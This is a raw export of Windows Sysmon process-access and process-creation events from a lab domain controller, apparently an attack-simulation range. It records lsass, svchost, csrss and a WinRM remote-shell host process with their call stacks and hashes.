10:39:18.171{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000440Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000439Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.171{733EE690-3C69-5F80-1400-000000007E01}13321428C:\Windows\system32\svchost.exe{733EE690-3DD6-5F80-0703-000000007E01}4788C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x8000000000000000438Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.156{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD6-5F80-0703-000000007E01}4788C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000437Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.156{733EE690-3DD6-5F80-0803-000000007E01}39323388C:\Windows\system32\conhost.exe{733EE690-3DD6-5F80-0703-000000007E01}4788C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000436Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C5B-5F80-0500-000000007E01}640656C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-0803-000000007E01}3932C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000435Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000434Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000433Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000432Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000431Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000430Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000429Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000428Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000427Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C68-5F80-0C00-000000007E01}6081096C:\Windows\system32\svchost.exe{733EE690-3DD0-5F80-ED02-000000007E01}4980C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000426Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C5B-5F80-0500-000000007E01}6401216C:\Windows\system32\csrss.exe{733EE690-3DD6-5F80-0703-000000007E01}4788C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000425Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C68-5F80-0C00-000000007E01}608932C:\Windows\system32\svchost.exe{733EE690-3DD6-5F80-0703-000000007E01}4788C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000424Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.147{733EE690-3DD6-5F80-0703-000000007E01}4788C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{733EE690-3DD6-5F80-A6AA-110000000000}0x11aaa60HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{733EE690-3C68-5F80-0C00-000000007E01}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x8000000000000000423Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000422Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000421Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.140{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000420Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.093{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000419Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.093{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000418Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.093{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000417Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:18.093{733EE690-3C66-5F80-0B00-000000007E01}8643760C:\Windows\system32\lsass.exe{733EE690-3C69-5F80-1400-000000007E01}1332C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000416Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 